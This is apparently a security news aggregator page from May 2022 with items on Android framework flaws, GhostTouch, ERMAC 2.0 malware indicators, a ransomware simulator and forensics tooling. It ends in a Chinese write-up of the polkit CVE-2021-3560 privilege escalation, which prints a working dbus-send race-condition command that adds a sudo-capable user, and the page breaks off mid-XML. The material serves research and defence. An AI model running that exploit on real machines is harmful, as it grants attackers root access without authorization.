🔒
There are new articles available, click to refresh the page.
Today — 27 May 2022Main stream

Android pre-installed apps are affected by high-severity vulnerabilities

27 May 2022 at 21:37

Microsoft found several high-severity vulnerabilities in a mobile framework used in pre-installed Android System apps.

The Microsoft 365 Defender Research Team discovered four vulnerabilities (CVE-2021-42598CVE-2021-42599CVE-2021-42600, and CVE-2021-42601) in a mobile framework, owned by mce Systems, that is used by several mobile carriers in pre-installed Android System apps.

The researchers discovered the flaws in September 2021 and reported them to mce Systems and affected mobile service providers through Coordinated Vulnerability Disclosure (CVD) via Microsoft Security Vulnerability Research (MSVR).

The experts pointed out that the vulnerabilities affected apps with millions of downloads, the good news is that the flaws have been fixed.

Threat actors could have abused these pre-installed apps to access system configuration and sensitive information.

“As it is with many of pre-installed or default applications that most Android devices come with these days, some of the affected apps cannot be fully uninstalled or disabled without gaining root access to the device. We worked with mce Systems, the developer of the framework, and the affected mobile service providers to solve these issues.” reads the post published by Microsoft.

The bad news is that some of the affected apps cannot be fully uninstalled or disabled without root access to the device. 

The experts discovered that the framework had a “BROWSABLE” service activity that can be remotely invoked to exploit several vulnerabilities. Threat actors could exploit these issues to implant a persistent backdoor or take substantial control over the device.

pre-installed apps flaws
BROWSABLE Activity with the “mcedigital://” scheme (source Microsoft)

The framework was designed to implement self-diagnostic mechanisms, for this reason it runs with permissions to valuable resources. Microsoft experts highlight that affiliated apps also included extensive device privileges that could be exploited via the vulnerable framework.

“Our analysis further found that the apps were embedded in the devices’ system image, suggesting that they were default applications installed by phone providers. All of the apps are available on the Google Play Store where they go through Google Play Protect’s automatic safety checks, but these checks previously did not scan for these types of issues.” continues Microsoft. “As part of our effort to help ensure broad protection against these issues, we shared our research with Google, and Google Play Protect now identifies these types of vulnerabilities.”

mce Systems has fixed the issues and provided framework update to the impacted providers. The good news is that at the time of publication, the researchers are not aware of attacks in the wild exploring these vulnerabilities.

“Several other mobile service providers were found using the vulnerable framework with their respective apps, suggesting that there could be additional providers still undiscovered that may be impacted.” concludes the report.

Security Affairs is one of the finalists for the best European Cybersecurity Blogger Awards 2022 – VOTE FOR YOUR WINNERS. I ask you to vote for me again (even if you have already done it), because this vote is for the final.

Please vote for Security Affairs and Pierluigi Paganini in every category that includes them (e.g. sections “The Underdogs – Best Personal (non-commercial) Security Blog” and “The Tech Whizz – Best Technical Blog”)

To nominate, please visit: 

https://docs.google.com/forms/d/e/1FAIpQLSdNDzjvToMSq36YkIHQWwhma90SR0E9rLndflZ3Cu_gVI2Axw/viewform

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Android pre-installed apps)

The post Android pre-installed apps are affected by high-severity vulnerabilities appeared first on Security Affairs.

LEAF - Linux Evidence Acquisition Framework


Linux Evidence Acquisition Framework (LEAF) acquires artifacts and evidence from Linux EXT4 systems, accepting user input to customize the functionality of the tool for easier scalability. Offering several modules and parameters as input, LEAF is able to use smart analysis to extract Linux artifacts and output to an ISO image file.


Usage

LEAF_master.py [-h] [-i INPUT [INPUT ...]] [-o OUTPUT] [-u USERS [USERS ...]] [-c CATEGORIES [CATEGORIES ...]] [-v]
[-s] [-g [GET_FILE_BY_OWNER [GET_FILE_BY_OWNER ...]]] [-y [YARA [YARA ...]]]
[-yr [YARA_RECURSIVE [YARA_RECURSIVE ...]]] [-yd [YARA_DESTINATIONS [YARA_DESTINATIONS...]]]

LEAF (Linux Evidence Acquisition Framework) - Cartware
____ _________ ___________ __________
/ / / _____/ / ____ / / ______/
/ / / /____ / /___/ / / /____
/ / / _____/ / ____ / / _____/
/ /_____ / /_____ / / / / / /
/_________/ /_________/ /___/ /___/ /___/ v2.0

Process Ubuntu 20.04/Debian file systems for forensic artifacts, extract important data, and export information to an ISO9660 file. Compatible with EXT4 file system and common locations on Ubuntu 20.04 operating system. See help page for more information. Suggested usage: Do not run from LEAF/ directory

Parameters

optional arguments:

-h, --help show this help message and exit

-i INPUT [INPUT ...], --input INPUT [INPUT ...]
Additional Input locations. Separate multiple input files with spaces
Default: /home/user1/Desktop/LEAF-3/target_locations

-o OUTPUT, --output OUTPUT

Output directory location

Default: ./LEAF_output

-u USERS [USERS ...], --users USERS [USERS ...]

Users to include in output, separated by spaces (i.e. -u alice bob root).
Users not present in /etc/passwd will be removed
Default: All non-service users in /etc/passwd
-c CATEGORIES [CATEGORIES ...], --categories CATEGORIES [CATEGORIES ...]< br/> Explicit artifact categories to include during acquisition.
Categories must be separated by space, (i.e. -c network users apache).
Full List of built-in categories includes:
APPLICATIONS, EXECUTIONS, LOGS, MISC, NETWORK, SHELL, STARTUP, SERVICES, SYSTEM, TRASH, USERS
Categories are compatible with user-inputted files as long as they follow the notation:
# CATEGORY
/location1
/location2
.../location[n]
# END CATEGORY
Default: "all"
-v, --verbose Output in verbose mode, (may conflict with progress bar)
Default: False
-s, --save Save the raw evidence directory
Default: False
-g [GET_ OWNERSHIP [GET_OWNERSHIP ...]], --get_ownership [GET_OWNERSHIP [GET_OWNERSHIP ...]]
Get files and directories owned by included users.
Enabling this will increase parsing time.
Use -g alone to parse from / root directory.
Include paths after -g to specify target locations (i.e. "-g /etc /home/user/Downloads/
Default: Disabled
-y [YARA [YARA ...]], --yara [YARA [YARA ...]]
Configure Yara IOC scanning. Select -y alone to enable Yara scanning.
Specify '-y /path/to/yara/' to specify custom input location.
For multiple inputs, use spaces between items,
i.e. '-y rulefile1.yar rulefile2.yara rule_dir/'
All yara files m ust have ".yar" or ".yara" extension.
Default: None
-yr [YARA_RECURSIVE [YARA_RECURSIVE ...]], --yara_recursive [YARA_RECURSIVE [YARA_RECURSIVE ...]]
Configure Recursive Yara IOC scanning.
For multiple inputs, use spaces between items,
i.e. '-yr rulefile1.yar rulefile2.yara rule_dir/'.
Directories in this list will be scanned recursively.
Can be used in conjunction with the normal -y flag,
but intersecting directories will take recursive priority.
Default: None
-yd [YARA_DESTINATIONS [YARA_DESTINATIONS...]], --yara_destinations [YARA_DESTINATIONS [YARA_DESTINATIONS...]]
Destination to run yara files against.
Separate multiple targets with a space.(i.e. /home/alice/ /bin/star/)
Default: All user directories

Example Usages:

To use default arguments [this will use default input file (./target_locations), users (all users), categories (all categories), and output location (./LEAF_output/). Cloned data will not be stored in a local directory, verbose mode is off, and yara scanning is disabled]:
LEAF_main.py

All arguments:
LEAF_main.py -i /home/alice/Desktop/customfile1.txt -o /home/alice/Desktop/ExampleOutput/ -c logs startup services apache -u alice bob charlie -s -v -y /path/to/yara_rule1.yar -yr /path2/to/yara_rules/ -yd /home/frank -g /etc/

To specify usernames, categories, and yara files:
LEAF_main.py -u alice bob charlie -c applications executions users -y /home/alice/Desktop/yara1.yar /home/alice/Desktop/yara2.yar

To include custom input file(s) and categories:
LEAF_main.py -i /home/alice/Desktop/customfile1.txt /home/alice/Desktop/customfile2.t xt -c apache xampp

How to Use

  • Install Python requirements:
    • Python 3 (preferably 3.8 or higher) (apt install python3)
    • pip 3 (apt install pip3)
  • Download required modules
    • Install modules from requirements.txt (pip3 install -r requirements.txt)
    • If you get an installation error, try sudo -H pip3 install -r requirements.txt
  • Run the script
    • sudo python3 LEAF_master.py with optional arguments


Threat Roundup for May 20 to May 27

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between May 20 and May 27. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics,...

[[ This is only the beginning! Please visit the blog for the complete entry ]]

Four Takeaways as the European Union’s General Data Protection Regulation (GDPR) Turns 4

27 May 2022 at 18:44

This blog was originally published on Security Senses.

May 25, 2022, marked four years since the European Union’s General Data Protection Regulation (GDPR) went into effect. Although the scope of the law is limited to personal data originating from activities in the European Economic Area, the ensuing requirements have had a global impact. This is evident in similar laws that have been proposed or passed and measures multinational organizations have taken to comply with privacy requirements. In parallel, there has been a convergence of a principles-based approach to cybersecurity in many jurisdictions worldwide.

In light of the trends of the past four years, there are four clear takeaways for organizations seeking to meet their GDPR obligations.

1. GDPR Is not a Static Set of Requirements

During the past four years, organizations around the globe have adapted to comply with GDPR requirements, while those requirements and the threats posed to privacy have been anything but static. The European Data Protection Board (EDPB), the GDPR-era successor to the Article 29 Working Party, has issued updated guidance on a variety of areas. These include privacy-by-design guidelines as well as breach notification examples and response guidelines. Simultaneously, as shown in the CrowdStrike 2022 Global Threat Report, threats to data protection continue to evolve, requiring organizations to assess their GDPR compliance programs in the context of today’s security risks and GDPR requirements, rather than those of 2018.

2. Achieving Security-by-Design and Privacy-by-Design Is Not “Set and Forget”

As a principles-based regulation, GDPR includes obligations to incorporate privacy-by-design and to implement safeguards appropriate to the risk. EDPB guidelines make clear that privacy-by-design is an evolving standard that imposes on organizations a duty “to take account of the current progress in technology that is available in the market.” Furthermore, the EDPB guidance drives home the point that organizations may find themselves in violation of GDPR Arts. 25 and 32, where “a measure that once provided an adequate level of protection no longer does.”

This evolving standard of GDPR is a reflection of why security approaches, such as legacy antivirus, are mismatched for today’s realities. As workloads and data storage increasingly move from traditional endpoints to cloud offerings, cyber threat actors have expanded their targets. In fact, cyber threat actors often do not discriminate between personal or general, on-premise enterprise environments versus cloud environments. They target resources and data wherever they exist, and frequently move between local and cloud environments in an attempt to achieve their objectives.1 This is one reason why accidental data exposures that happen through, for example, misconfigured cloud storage environments are also increasingly a source of potential privacy issues. Moreover, threat actors use cloud hosting to disguise their intrusions as benign network traffic, and a variety of legitimate software and cloud hosting services to access company networks.

3. Mitigating Risk Can Mitigate Breach Obligations

Like many breach notification obligations, GDPR’s language is designed to reduce breach fatigue by creating an impact-driven duty to notify regulators and, in the most severe of instances, individuals. Recent guidance for the EDPB makes clear not all breaches have the same level of severity. For example, an incident where a threat actor sees a list of user names might have a small or negligible impact on affected parties. Whereas, another incident in which a threat actor exfiltrates complete financial or medical records may have a severe impact.

Some personal data may be considered benign enough that it would not even be considered reportable if a breach was to occur. Whereas, other personal data could pose a risk or high risk to the fundamental rights of data subjects. Such guidance is relevant for cross border data flows as well. Put simply, if certain types of personal data in a data breach would not be reportable, it raises the question as to whether there should be any barriers to data flows in a transfer impact assessment.

As a practical matter, the data breach guidance repeatedly endorses the notion of using centralized logs as a critical component in breach prevention and assessment. This is because security teams demand contextual awareness and visibility from across their entire environments, including within cloud and ephemeral environments. Log management is critical to understanding what happened. Going beyond this, extended detection and response (XDR), can be leveraged to apply order to a sometimes chaotic array of security tools by deriving actionable insights wherever they exist within the enterprise, and generate intelligence from what otherwise may be an information overload. Holistic XDR unifies detection and response across the entire security stack. 

4. Threats to Data Protection Aren’t Going Away

Legal guidance related to GDPR is not the only thing that has evolved in the past four years. The threats to privacy that GDPR principles require organizations to protect against have evolved as well. As CrowdStrike’s Global Threat Report highlighted, cyber actors pose a significant threat to organizations and, especially, to data protection compliance. In fact, CrowdStrike observed an 82% increase in ransomware data leaks from 2020 to 2021 alone. Moreover, there is the stark reality that 62% of attacks observed by CrowdStrike did not involve malware but instead were conducted via hands-on-keyboard activity. These realities make clear that using legacy antivirus technologies to protect personal data do not meet GDPR’s standards of implementing state-of-the-art security measures appropriate for today’s risks.

The Future of GDPR

Organizations subject to GDPR should evaluate whether measures put in place four years ago are still sufficient today. Both the legal guidance interpreting GDPR as well as the threats to privacy continue to evolve, and compliance is a moving target. Moreover, there have been significant fines under both GDPR and UK GDPR against organizations that do not implement appropriate safeguards to protect personal data. Consequently, as a practical matter, investing in ENISA endorsed security measures such as XDR, zero trust, log management and threat hunting is a fundamental part of compliance today.

Drew Bagley is Vice President and Counsel, Privacy and Cyber Policy at CrowdStrike.

Endnotes

  1. George Kurtz, Testimony on Cybersecurity and Supply Chain Threats, Senate Select Committee on Intelligence (Feb. 23, 2021).

Additional Resources

Experts Detail New RCE Vulnerability Affecting Google Chrome Dev Channel

27 May 2022 at 16:14
Details have emerged about a recently patched critical remote code execution vulnerability in the V8 JavaScript and WebAssembly engine used in Google Chrome and Chromium-based browsers. The issue relates to a case of use-after-free in the instruction optimization component, successful exploitation of which could "allow an attacker to execute arbitrary code in the context of the browser." The

Nearly 100,000 NPM Users' Credentials Stolen in GitHub OAuth Breach

27 May 2022 at 15:36
Cloud-based repository hosting service GitHub on Friday shared additional details into the theft of GitHub integration OAuth tokens last month, noting that the attacker was able to access internal NPM data and its customer information. "Using stolen OAuth user tokens originating from two third-party integrators, Heroku and Travis CI, the attacker was able to escalate access to NPM infrastructure

GhostTouch: how to remotely control touchscreens with EMI

27 May 2022 at 14:45

Security researchers devised a technique, dubbed GhostTouch, to remotely control touchscreens using electromagnetic signals.

A team of researchers from Zhejiang University and Technical University of Darmstadt devised a technique, dubbed GhostTouch, to remotely control capacitive touchscreens using electromagnetic signals.

According to the experts, GhostTouch is the first active contactless attack against capacitive touchscreens.

GhostTouch uses electromagnetic interference (EMI) to remotely inject fake touch points into a capacitive device. The researchers demonstrated how to inject two types of basic touch events, taps and swipes, into targeted locations of the touchscreen. The events allowed the researchers to control the devices (i.e. answering an eavesdropping phone call, pressing the button, swiping up to unlock), the attack technique was successful on nine smartphone models.

“We can inject targeted taps continuously with a standard deviation of as low as 14.6 x 19.2 pixels from the target area, a delay of less than 0.5s and a distance of up to 40mm. We show the real-world impact of the GhostTouch attacks in a few proof-of-concept scenarios, including answering an eavesdropping phone call, pressing the button, swiping up to unlock, and entering a password.” reads the research paper published by the academics. “Finally, we discuss potential hardware and software countermeasures to mitigate the attack.”


The GhostTouch system consists of two components, a touch injector and a phone locator. The touch injector is used to inject touch events into the touchscreen and includes a signal generator, an amplifier, an on/off switch, and a receiving antenna array. The phone locator is used to identify the position of the touchscreen and consists of a sensing antenna array, a data acquisition device, and a location calculator.

The experimental lab setup up by the researchers is composed of an electrostatic gun used to generate a strong pulse signal which is sent to an antenna to transmit an electromagnetic field to the touchscreen.

Below are a couple of video PoCs of attacks devised by the experts that show GhostTouch attack to answer the phone call and connect the malicious Bluetooth.

ghosttouch

ghosttouch

The experts tested the technique against nine different smartphone models, including Galaxy A10s, Huawei P30 Lite, Honor View 10, Galaxy S20 FE 5G, Nexus 5X, Redmi Note 9S, Nokia 7.2, Redmi 8, and an iPhone SE (2020).

“We demonstrate the feasibility of this attack in the real world.” concludes the paper. “In places like a cafe, library, meeting room, or conference lobbies, people might place their smartphone face-down on the table2. An attacker may embed the attack equipment under the table and launch attacks remotely. For example, an attacker may impersonate the victim to answer a phone call which would eavesdrop the private conversation, or visit a malicious website.”

The researchers provided a series of countermeasures to neutralize the attack, including adding electromagnetic shielding to block EMI, reinforcing the touchscreen, improving the detection algorithm of the touchscreen, and forcing some form of authentication for the execution of high-risk actions.

Security Affairs is one of the finalists for the best European Cybersecurity Blogger Awards 2022 – VOTE FOR YOUR WINNERS. I ask you to vote for me again (even if you have already done it), because this vote is for the final.

Please vote for Security Affairs and Pierluigi Paganini in every category that includes them (e.g. sections “The Underdogs – Best Personal (non-commercial) Security Blog” and “The Tech Whizz – Best Technical Blog”)

To nominate, please visit: 

https://docs.google.com/forms/d/e/1FAIpQLSdNDzjvToMSq36YkIHQWwhma90SR0E9rLndflZ3Cu_gVI2Axw/viewform

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, GhostTouch)

The post GhostTouch: how to remotely control touchscreens with EMI appeared first on Security Affairs.

The Myths of Ransomware Attacks and How To Mitigate Risk

27 May 2022 at 13:28
Today's modern companies are built on data, which now resides across countless cloud apps. Therefore preventing data loss is essential to your success. This is especially critical for mitigating against rising ransomware attacks — a threat that 57% of security leaders expect to be compromised by within the next year.  As organizations continue to evolve, in turn so does ransomware. To help you

FBI: Compromised US academic credentials available on various cybercrime forums

27 May 2022 at 13:22

The FBI warns organizations in the higher education sector of credentials sold on cybercrime forums that can allow threat actors to access their networks.

The FBI issued an alert to inform the higher education sector about the availability of login credentials on dark web forums that can be used by threat actors to launch attacks against individuals and organizations in the industry. The availability of this data is the result of continued attacks conducted by threat actors against US colleges and universities. The alert also includes recommendations and mitigations for these attacks.

“The FBI is informing academic partners of identified US college and university credentials advertised for sale on online criminal marketplaces and publically accessible forums. This exposure of sensitive credential and network access information, especially privileged user accounts, could lead to subsequent cyber attacks against individual users or affiliated organizations.” reads the alert published by the FBI.

Crooks obtain the information by conducting spear-phishing and ransomware attacks, or other means.

In 2017, crooks launched a phishing campaign against universities to compromise .edu accounts. The attackers set up fake university login pages and embedded a credential harvester link in phishing emails.

In late 2020, credentials for US-based universities were found for sale on the dark web. The seller listed approximately 2,000 unique credentials.

In May 2021, cybercriminals offered more than 36,000 login credentials for .edu email accounts and advertised the data on an instant messaging platform.

In May 2021, over 36,000 email and password combinations for .edu email accounts were offered for sale on a publically available instant messaging platform.

Recently, in January 2022, threat actors have been observed offering for sale network and VPN access credentials belonging to US-based universities and colleges on Russian cybercrime forums.

“The FBI has observed incidents of stolen higher education credential information posted on publically accessible online forums or listed for sale on criminal marketplaces. The exposure of usernames and passwords can lead to brute force credential stuffing computer network attacks, whereby attackers attempt logins across various internet sites or exploit them for subsequent cyber attacks as criminal actors take advantage of users recycling the same credentials across multiple accounts, internet sites, and services,” concludes the alert. “If attackers are successful in compromising a victim account, they may attempt to drain the account of stored value, leverage or re-sell credit card numbers and other personally identifiable information, submit fraudulent transactions, exploit for other criminal activity against the account holder, or use for subsequent attacks against affiliated organizations.”

Security Affairs is one of the finalists for the best European Cybersecurity Blogger Awards 2022 – VOTE FOR YOUR WINNERS. I ask you to vote for me again (even if you have already done it), because this vote is for the final.

Please vote for Security Affairs and Pierluigi Paganini in every category that includes them (e.g. sections “The Underdogs – Best Personal (non-commercial) Security Blog” and “The Tech Whizz – Best Technical Blog”)

To nominate, please visit: 

https://docs.google.com/forms/d/e/1FAIpQLSdNDzjvToMSq36YkIHQWwhma90SR0E9rLndflZ3Cu_gVI2Axw/viewform

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, FBI)

The post FBI: Compromised US academic credentials available on various cybercrime forums appeared first on Security Affairs.

How and Why to Unhook the Import Address Table

27 May 2022 at 09:33
By: Author
One day, I was trying to bypass an EDR and I noticed something interesting. The EDR I was trying to bypass wasn’t hooking the DLL in their code with jmp instruction like other EDRs in user-land. In this case, it was hooking directly the Import Address Table. This technique makes the usual move like live-patching, or erasing the loaded DLL with one freshly loaded from disk useless. I had to unhook the Import Address Table of my process.

Ransomware-Simulator - Ransomware Simulator Written In Golang


The goal of this repository is to provide a simple, harmless way to check your AV's protection on ransomware.

This tool simulates typical ransomware behaviour, such as:

  • Staging from a Word document macro
  • Deleting Volume Shadow Copies
  • Encrypting documents (embedded and dropped by the simulator into a new folder)
  • Dropping a ransomware note to the user's desktop

The ransomware simulator takes no action that actually encrypts pre-existing files on the device, or deletes Volume Shadow Copies. However, any AV products looking for such behaviour should still hopefully trigger.

Each step, as listed above, can also be disabled via a command line flag. This allows you to check responses to later steps as well, even if an AV already detects earlier steps.


Usage

Run command:
Run Ransomware Simulator

Usage:
ransomware-simulator run [flags]

Flags:
--dir string Directory where files that will be encrypted should be staged (default "./encrypted-files")
--disable-file-encryption Don't simulate document encryption
--disable-macro-simulation Don't simulate start from a macro by building the following process chain: winword.exe -> cmd.exe -> ransomware-simulator.exe
--disable-note-drop Don't drop pseudo ransomware note
--disable-shadow-copy-deletion Don't simulate volume shadow copy deletion
-h, --help help for run
--note-location string Ransomware note location (default "C:\\Users\\neo\\Desktop\\ransomware-simulator-note.txt")



Attackers Can Use Electromagnetic Signals to Control Touchscreens Remotely

27 May 2022 at 12:15
Researchers have demonstrated what they call the "first active contactless attack against capacitive touchscreens." GhostTouch, as it's called, "uses electromagnetic interference (EMI) to inject fake touch points into a touchscreen without the need to physically touch it," a group of academics from Zhejiang University and Technical University of Darmstadt said in a new research paper. The core

ERMAC 2.0 Android Banking Trojan targets over 400 apps

27 May 2022 at 09:56

A new version of the ERMAC Android banking trojan is able to target an increased number of apps.

The ERMAC Android banking trojan version 2.0 can target an increasing number of applications, passing from 378 to 467 target applications to steal account credentials and crypto-wallets.

ERMAC was first spotted by researchers from Threatfabric in July 2021, it is based on the popular banking trojan Cerberus. The source code of Cerberus was released in September 2020 on underground hacking forums after its operators failed an auction.

According to the experts, ERMAC is operated by threat actors behind the BlackRock mobile malware.

ERMAC 2.0 was discovered by ESET researchers after a campaign impersonating Bolt Food targeted Polish users. The malware is available for rent on underground forums for $5000 per month since March 2022.

ERMAC

A new #Android banker ERMAC 2.0 impersonates #Bolt Food and targets 🇵🇱 Polish users.
Available for rent on underground forums for $5K/month since March 2022, ERMAC 2.0 already has an active campaign. #ESETresearch @LukasStefanko 1/3 pic.twitter.com/hGeD4ZSwve

— ESET research (@ESETresearch) May 18, 2022

ERMAC 2.0 is able to steal credentials for financial and cryptocurrency apps included in the list of targeted apps that are sent by the C2.

The researchers also shared indicators of compromise (IoCs) for this version.

IoCs:
Distribution: bolt-food[.]site
Dropper: 301E2AB9707ABE193BB627C60F5E4B8736C86FE9
Payload: CCADCC836F3B6FC80FB3C49D507099846B5B71B3
C&C: 193.106.191[.]116, 193.106.191[.]148, 193.106.191[.]121, 185.215.113[.]100, 193.106.191[.]118#ESETresearch 3/3 pic.twitter.com/jY7maTyPxo

— ESET research (@ESETresearch) May 18, 2022

Researchers from Cyble analyzed the malware after the initial discovery made by ESET

ERMAC first determines what applications are installed on the host device and then sends the information to the C2 server.

Researchers from Cyble published a technical analysis of the malware after the initial discovery made by ESET. The malicious app asks for 43 permissions, of which the TA exploits 12. Below is the list of permission requested to conduct malicious activities and take over the infected device:  

Permission   Description  
REQUEST_INSTALL_PACKAGES  Allows an application to request installing    packages 
CALL_PHONE  Allows an application to initiate a phone call   without going through the Dialer user    interface for the user to confirm the call 
RECEIVE_SMS  Allows an application to receive SMS messages 
READ_SMS  Allows an application to read SMS messages 
SEND_SMS  Allows an application to send SMS    messages 
READ_CONTACTS  Allows an application to read the user’s    contacts data 
READ_PHONE_STATE  Allows read access to the device’s phone    number 
SYSTEM_ALERT_WINDOW  Allows an app to create windows shown on    top of all other apps. 
READ_EXTERNAL_STORAGE  Allows an application to read from external storage   
RECORD_AUDIO  Allows an application to record audio   
WRITE_EXTERNAL_STORAGE  Allows an application to write to external    storage 

while the list of commands supported by ERMAC 2.0 to execute malicious operations is:

Command  Description 
downloadingInjections  Sends the application list to download injections
logs  Sends injection logs to the server
checkAP Check the application status and send it to the server 
registration Sends device data 
updateBotParams Sends the updated bot parameters 
downloadInjection Used to receive the phishing HTML page 

“The Threat Actor behind ERMAC used the leaked code from a well-known malware variant named “Cerberus” and modified the code to sell the Android botnets in cybercrime forums. Interestingly, we observed that ERMAC 2.0 is distributed rapidly through various phishing sites, primarily targeting Polish users.” concludes Cyble. “ERMAC 2.0 steals credentials from different crypto wallets and targets multiple banking applications worldwide. We foresee that the TA behind ERMAC 2.0 will continue to develop new versions with more targeted applications, new TTPs, and new delivery methods.”

Security Affairs is one of the finalists for the best European Cybersecurity Blogger Awards 2022 – VOTE FOR YOUR WINNERS. I ask you to vote for me again (even if you have already done it), because this vote is for the final.

Please vote for Security Affairs and Pierluigi Paganini in every category that includes them (e.g. sections “The Underdogs – Best Personal (non-commercial) Security Blog” and “The Tech Whizz – Best Technical Blog”)

To nominate, please visit: 

https://docs.google.com/forms/d/e/1FAIpQLSdNDzjvToMSq36YkIHQWwhma90SR0E9rLndflZ3Cu_gVI2Axw/viewform

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, ERMAC 2.0)

The post ERMAC 2.0 Android Banking Trojan targets over 400 apps appeared first on Security Affairs.

A New Exploit Method for CVE-2021-3560 PolicyKit Linux Privilege Escalation

27 May 2022 at 08:52
By: RicterZ
A New Exploit Method for CVE-2021-3560 PolicyKit Linux Privilege Escalation

 

English Version: http://noahblog.360.cn/a-new-exploit-method-for-cve-2021-3560-policykit-linux-privilege-escalation-en

0x01. The Vulnerability

PolicyKit CVE-2021-3560 是 PolicyKit 没有正确的处理错误,导致在发送 D-Bus 信息后立刻关闭程序后,PolicyKit 错误的认为信息的发送者为 root 用户,从而通过权限检查,实现提权而产生的漏洞。漏洞的利用方式如下:

dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply \
    /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser \
    string:boris string:"Boris Ivanovich Grishenko" int32:1 & sleep 0.008s ; kill $!

以上命令的作用是在发送 D-Bus 信息后,在一个极短的时间差后利用 kill 命令杀死进程,经过多次尝试条件竞争后,可以实现以一个低权限用户添加一个拥有 sudo 权限的用户。

根据漏洞作者的描述和利用方法可知,此漏洞成功利用需要三个组件:

  1. Account Daemon,此服务用来添加用户;
  2. Gnome Control Center,此服务会用 org.freedesktop.policykit.imply 修饰 Account Daemon 的方法;
  3. PolicyKit ≥ 0.113。

其中 Account Daemon 和 Gnomo Control Center 在非桌面版的系统、Red Hat Linux 等系统中并不存在,这无疑减小了漏洞的利用覆盖面。

但是通过对于此漏洞的原理深入研究,我发现漏洞利用并没有特别大的限制,仅存在 PolicyKit 和一些基础 D-Bus 服务(比如 org.freedesktop.systemd1)的系统中仍然可以成功利用。在进行研究的过程中,发现实现利用需要涉及比较多的知识点,需要深入理解此漏洞的原理及 PolicyKit 的相关认证机制和流程。本文章旨在将整体的研究方法尽可能详细的描述出来,如有错误请指正。

0x02. Do Really Need an Imply Annotated Action

在漏洞作者的文章中(https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/)明确的写道:

The authentication bypass depends on the error value getting ignored. It was ignored on line 1121, but it's still stored in the error parameter, so it also needs to be ignored by the caller. The block of code above has a temporary variable named implied_error, which is ignored when implied_result isn't null. That's the crucial step that makes the bypass possible.

大体含义就是必须要有 org.freedesktop.policykit.imply 修饰后的方法才能实现认证绕过。根据文章中的 PoC 来看,这一点确实是母庸质疑的。具体原因和漏洞原理结合的非常紧密,可以通过查看代码来理解。首先先看一下 CVE-2021-3560 的漏洞函数,代码基于 Github 上的 polkit 0.115 版本:

static gboolean
polkit_system_bus_name_get_creds_sync (PolkitSystemBusName           *system_bus_name,
               guint32                       *out_uid,
               guint32                       *out_pid,
               GCancellable                  *cancellable,
               GError                       **error)
{

  // ...
  g_dbus_connection_call (connection,
        "org.freedesktop.DBus",       /* name */
        "/org/freedesktop/DBus",      /* object path */
        "org.freedesktop.DBus",       /* interface name */
        "GetConnectionUnixUser",      /* method */
        // ...
        &data);
  g_dbus_connection_call (connection,
        "org.freedesktop.DBus",       /* name */
        "/org/freedesktop/DBus",      /* object path */
        "org.freedesktop.DBus",       /* interface name */
        "GetConnectionUnixProcessID", /* method */
        // ...
        &data);

  while (!((data.retrieved_uid && data.retrieved_pid) || data.caught_error))
    g_main_context_iteration (tmp_context, TRUE);

  if (out_uid)
    *out_uid = data.uid;
  if (out_pid)
    *out_pid = data.pid;
  ret = TRUE;

  return ret;
}


polkit_system_bus_name_get_creds_sync 函数调用了两个 D-Bus 方法后,没有处理 data.caugh_error,直接设置了 out_uiddata.uid,又由于 data.uid 为 NULL,从而导致 out_uid 为 NULL,也就是 0,为 root 用户的 uid,从而错误的认为这个进程为 root 权限进程。

但是需要注意的是,在遇到错误时,data.error 会被设置为错误的信息,所以这里需要接下来的函数只验证了 ret 是否为 TRUE,而不去验证有没有错误。幸运的是,PolicyKit 中一个用途非常广泛的函数 check_authorization_sync就没有验证:

static PolkitAuthorizationResult *
check_authorization_sync (PolkitBackendAuthority         *authority,
                          PolkitSubject                  *caller,
                          PolkitSubject                  *subject,
                          const gchar                    *action_id,
                          PolkitDetails                  *details,
                          PolkitCheckAuthorizationFlags   flags,
                          PolkitImplicitAuthorization    *out_implicit_authorization,
                          gboolean                        checking_imply,
                          GError                        **error)
{
  // ...
  user_of_subject = polkit_backend_session_monitor_get_user_for_subject (priv->session_monitor,
                                                                         subject, NULL,
                                                                         error);
  /* special case: uid 0, root, is _always_ authorized for anything */
  if (identity_is_root_user (user_of_subject)) {
      result = polkit_authorization_result_new (TRUE, FALSE, NULL);
      goto out;
  }
  // ...
  if (!checking_imply) {
      actions = polkit_backend_action_pool_get_all_actions (priv->action_pool, NULL);
      for (l = actions; l != NULL; l = l->next) {
           // ...
           imply_action_id = polkit_action_description_get_action_id (imply_ad);
           implied_result = check_authorization_sync (authority, caller, subject,
                                                      imply_action_id,
                                                      details, flags,
                                                      &implied_implicit_authorization, TRUE,
                                                      &implied_error);
           if (implied_result != NULL) {
           if (polkit_authorization_result_get_is_authorized (implied_result)) {
               g_debug (" is authorized (implied by %s)", imply_action_id);
               result = implied_result;
               /* cleanup */
               g_strfreev (tokens);
               goto out;
           }
  // ...

这个函数有两处问题,第一个就是第一次调用 polkit_backend_session_monitor_get_user_for_subject 的时候直接返回 uid 为 0 的信息,然后直接通过认证,第二次是在检查 imply action 时,循环调用 check_authorization_sync 后再次遇到 polkit_backend_session_monitor_get_user_for_subject 返回 uid 为 0 的信息。所以此函数存在两个条件竞争的时间窗口:

check_authorization_sync 
-> polkit_backend_session_monitor_get_user_for_subject 
 -> return uid = 0

check_authorization_sync
 -> check_authorization_sync
  -> polkit_backend_session_monitor_get_user_for_subject 
   -> return uid = 0

漏洞作者分析到这里时,发现第一个竞争时间窗口并不能成功,因为后续调用 check_authorization_sync的函数都检查了错误信息,所以只能通过第二个时间窗口进行利用,也就是需要一个被 org.freedesktop.policykit.imply 修饰过的 action。首先解释下什么是 org.freedesktop.policykit.imply 修饰。

PolicyKit 的 action policy 配置文件通常在 /usr/share/polkit-1/actions/ 目录下,文件的内容如下所示:

<?xml version="1.0" encoding="UTF-8"?> <!--*-nxml-*-->
<!DOCTYPE policyconfig PUBLIC "-//freedesktop//DTD PolicyKit Policy Configuration 1.0//EN"
